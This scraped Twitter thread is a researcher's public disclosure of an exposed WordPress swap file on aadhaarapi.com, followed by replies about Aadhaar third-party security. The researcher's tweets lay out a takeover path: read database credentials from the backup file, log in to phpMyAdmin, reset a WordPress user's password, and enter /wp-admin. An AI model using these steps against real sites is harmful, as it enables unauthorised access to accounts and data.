After a quick @_WPScan_ scan you was able to see this line: "A wp-config.php backup file has been found in: 'https://aadhaarapi.com/.wp-config.php.swp …'"pic.twitter.com/BHnDR0jzDE
You can add location information to your Tweets, such as your city or precise location, from the web and via third-party applications. You always have the option to delete your Tweet location history. Learn more
After a quick @_WPScan_ scan you was able to see this line: "A wp-config.php backup file has been found in: 'https://aadhaarapi.com/.wp-config.php.swp …'"pic.twitter.com/BHnDR0jzDE
After the download of this file, you could open it like this: vim -R .wp-config.php.swp and obtain the database user and password.pic.twitter.com/qTdweo5NJP
Next step was to find the phpmyadmin panel. Testing the port 2083 or /phpmyadmin is always a good idea.pic.twitter.com/ngB5eRkUWc
After login, open the wp-user table and change the password of an existent user. Go to /wp-admin and enter the username with the new password, you are in!
Issue found: 16 Jan
1st contact with @aadhaarapi: 17 Jan
Issue fixed: 17 Jan
.@aadhaarapi after had been caught with an issue like this, can I suggest to, at least, update your #wordpress plugins
?pic.twitter.com/0tzCv7XcPN
Hey @aadharapi, Can you please tell us how the swap file got there? Do you not have a proper deployment process? Or is there no review of what gets committed and pushed? Or do your devs write code on the production machine (scary!)?
Guys at least learn to use puppet if you want to make us poor Indians into puppets at the end of the aadhaar chain. You're doing stupid things I've seen developers fired for, one after the other.
Sir I really dont understand coding at all but you are right.If this had been with a private company the people behind this would have been fired by now.
It is a private company, providing paid services on top of data they purchase from UIDAI. It's not Aadhaar itself.
A special sort of private company given the amount of access they have. A security auditor would have nightmares with this entire mess.
I did a little Google and found that AadharAPI are just Sub-AUA most probably getting their data from @KhoslaLabs which is primary AUA and responsible for security of data. Here is total list of AUA maintained by UIDAI.
https://uidai.gov.in/images/list_of_live_aua.pdf …
Ah, guess where the buck finally stops for security regardless sub sub sub aua type outsourcing?
It's not outsourcing.. It's auth service access. As I already said UIDAI need to extend their net. But at same time, you won't blame ICICI or Visa if someone hacks Paytm or PayU stored card database.
@UIDAI can you look into this? You need to extend your security checks to all 3rd party like these and avoid such potential vulnerabilities.
If their front facing sites are this carelessly coded, is it even safe to integrate the api with production sites?
Exactly.. It's open market. Find some secure ASA if AadharAPI feels insecure. Only thing is, UIDAI/Aadhaar and AadharAPI are two different entities. Don't go with similar names.
ANDDDD... ..JUST LIKE THAT they have the "worlds most largest private database?" FFS
@rssharma3 @UIDAI - Am assuming you still want to stick to your age old dialogue of 'There has never been an Aadhar breach , and anyone saying otherwise is a lier'?
These same jokers (Quagga Tech) were responsible for API key leak that resulted in fakes getting into the system. https://medium.com/karana/insecure-app-making-abd8548c3092 …pic.twitter.com/x3qitug6sS
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.